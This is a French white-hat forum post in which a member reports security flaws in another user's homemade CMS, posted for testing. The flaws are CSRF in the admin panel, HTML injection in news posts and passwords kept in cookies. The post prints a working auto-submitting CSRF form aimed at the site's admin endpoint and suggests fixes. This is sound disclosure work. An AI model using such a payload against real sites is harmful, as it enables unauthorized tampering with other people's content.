Vous êtes au niveau: Accueil / N-PN White-Hat Project / Communauté / Faites tester vos sites / MyCMS






  • STATISTIQUES
  • Il y a eu un total de 0 membres et 47794 visiteurs sur le site dans les dernières 24h pour un total de 47 794 personnes!
    Membres: 2 605
    Discussions: 3 579
    Messages: 32 816
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [FR] Cyber-Hacker
    CH - Cyber Hacker est un jeu par navigateur de simulation de hack, programmez et envoyez vos virus et piratez les aut...
    Hacking
    [EN] Sabre Films
    Site de challenge présenté sous la forme d'une quête. Vous êtes un détective et devrez résoudre d...
    Challenges
    [EN] Defcon
    Lancé en 1992 par Dark Tangent, DEFCON est la plus ancienne et la plus grande conférence underground de...
    Hacking
    [FR] PHP France
    Pour tout savoir sur le PHP, en français. Vous trouverez des tutoriels, des exemples, des astuces, toute la do...
    Hacking
    [EN] Listbrain Version 3
    Site proposant 66 challenges présentés dans une liste mélangée.
    Challenges
    [EN] Packet Storm
    Packet Storm est un site qui combine nouvelles de la sécurité informatique, téléchargemen...
    Vulnérabilités
    [FR] Root-me
    Script: 5, Système: 20, Cracking: 16, Cryptanalyse: 17, Programmation: 8, Réaliste: 11, Réseau: 10, Stéganog...
    Challenges

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
Affichage linéaire
MyCMS
28-09-2012, 17h46 (Modification du message : 28-09-2012, 17h47 par kallimero.)
Message : #3
kallimero Hors ligne
Imbécile heureux
*



Messages : 37
Sujets : 2
Points: 4
Inscription : Aug 2011
RE: MyCMS
L'interface admin semble être atteinte d'une csrf (désolé d'avoir casser l'article en le testant), couplé a la possibilité d'injecter du html dans les news, et au stockage du mot de pass dans les cookies, il est très facile de pwn ton cms.

Utilise un système de token anti-csrf, et un autre système d'auth (par session par exemple).

Pour la csrf, j'ai utilisé ceci :
Code :
<body onload="document.forms[0].submit();">
<form method="post" action="http://overwr1t3.byethost31.com/admin/_modnews.php">
    <input type="hidden" name="titleBox" value="Pentest" >
    <input type="hidden" name="oldtitleBox" value="Pentest">
    <input type="hidden" name="newsBox" value="csrf test">
</form>
</body>


Pour modifier l'article pentest.
Avec un peu d'huile de coude, du js avec des timers et iframe, on peux imaginer un exploit en un lien.
http://epic.orgasm.re/
+1 (1) -1 (0) Répondre


Messages dans ce sujet
MyCMS - par Swissky - 27-09-2012, 22h39
RE: MyCMS - par CyberSee - 27-09-2012, 23h12
RE: MyCMS - par kallimero - 28-09-2012, 17h46
RE: MyCMS - par kallimero - 28-09-2012, 18h45
RE: MyCMS - par Swissky - 28-09-2012, 22h24
RE: MyCMS - par EpicOut - 28-09-2012, 22h42
RE: MyCMS - par Swissky - 28-09-2012, 22h51
RE: MyCMS - par EpicOut - 28-09-2012, 22h52

Atteindre :


Utilisateur(s) parcourant ce sujet : 5 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut